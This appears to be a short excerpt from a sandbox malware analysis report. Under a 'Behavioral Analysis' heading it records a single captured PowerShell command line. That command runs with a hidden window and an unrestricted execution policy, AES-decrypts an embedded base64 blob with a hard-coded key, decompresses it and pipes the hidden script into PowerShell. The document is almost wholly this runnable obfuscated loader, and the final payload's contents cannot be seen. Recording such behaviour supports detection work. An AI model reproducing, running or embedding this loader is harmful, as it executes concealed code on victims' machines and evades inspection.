Behavioral Analysis

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $dMjcTRK = 'AAAAAAAAAAAAAAAAAAAAAADov4LCHPcq+5FUQS+L34/CefVyIeQtxjTsRmOOMGX5eTxgBOTb1/YzVpGoSuh7BTBA1qFlrvOuA5Itk2cF6ig+G69AJ8sIMC1nih0zGBw3JQtzH5a88QrX2D6+ZhDkMDvHoVxvc0R+Yu6qWfkeq6zHE3eASLE23XjyoTJtGNAg94ls0o75l3ajwsWltBj4/AzD67DDJcSE7EbwgvUrxOzO+TANVNrYUo4DIwuuAWPvlCOwcPptRJLUoxdVERmJPvGIb6eY9n1ntfYGuz2z5y/PdKUgK15BCIWCz1VQ3Q/kQcQGKlaETkOixON9Lkw9nyhX90os3juV1n4sLe3UxOQijbMAIG3vt8IOwaMQTqEJYHVy42tKXNeBDRvTLjB+fak0TXm8Vd1g5i7ha0DTSJmIEpSq6eNofPx0yNRbjLEIyMZXIvOQC0QLkLR78XTOpIk7FjR9FIP9V0XpcbyamPKPoTBfxc8jrgOG46rpQvVIN5bOIs5/Jqmop/qps9GEgkrWKzpuJb6iN5rMGGtYVGLCeC1Bpn4gQQeIZRxQHkfrhLv1P/WrvQq0fEST9Ee+kxEHr6VCE0B0yf4Dy2FMQU72mA68wT6jFlf6ar12AAlK';$xxMOE = 'Z29pdG9sVkJZVUVyREx6dW1HQ1JOY2FScFB2RGN1R2k=';$rHXSzlE = New-Object 'System.Security.Cryptography.AesManaged';$rHXSzlE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rHXSzlE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rHXSzlE.BlockSize = 128;$rHXSzlE.KeySize = 256;$rHXSzlE.Key = [System.Convert]::FromBase64String($xxMOE);$YAUel = [System.Convert]::FromBase64String($dMjcTRK);$EuMegIfR = $YAUel[0..15];$rHXSzlE.IV = $EuMegIfR;$IVASmKIQq = $rHXSzlE.CreateDecryptor();$DUSZFZYkI = $IVASmKIQq.TransformFinalBlock($YAUel, 16, $YAUel.Length - 16);$rHXSzlE.Dispose();$rRiC = New-Object System.IO.MemoryStream( , $DUSZFZYkI );$TnzBbxt = New-Object System.IO.MemoryStream;$PwoKIZPQa = New-Object System.IO.Compression.GzipStream $rRiC, ([IO.Compression.CompressionMode]::Decompress);$PwoKIZPQa.CopyTo( $TnzBbxt );$PwoKIZPQa.Close();$rRiC.Close();[byte[]] $bujqhPe = $TnzBbxt.ToArray();$SeyUotYt = [System.Text.Encoding]::UTF8.GetString($bujqhPe);$SeyUotYt | powershell -